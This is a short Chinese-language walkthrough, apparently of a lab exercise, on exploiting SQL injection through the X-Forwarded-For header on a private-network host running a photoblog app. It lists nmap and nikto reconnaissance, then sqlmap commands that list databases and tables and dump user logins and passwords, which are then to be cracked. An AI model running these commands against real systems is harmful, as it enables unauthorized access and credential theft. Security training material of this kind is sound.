SQL注入（x-forwarded）

信息探测

扫描主机服务信息以及服务版本

nmap -sV 192.168.101.52

快速扫描主机全部信息

nmap -T4 -A -v 192.168.101.52

探索敏感信息

nikto -host http://192.168.101.52:80

访问192.168.101.52/admin/login.php

使用AVWS漏洞扫描192.168.101.52的漏洞

使用sqlmap利用sql注入漏洞

sudo sqlmap -u "http://192.168.101.52" --headers="X-Forwarded-For:*" --dbs --batch		探测数据库有那些库

sudo sqlmap -u "http://192.168.101.52" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch 		探测数据库有那些表

sudo sqlmap -u "http://192.168.101.52" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch 	探测表字段

sudo sqlmap -u "http://192.168.101.52" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C "login,password" --dump --batch	查看对应字段的值

破解密码后，返回浏览器进行登录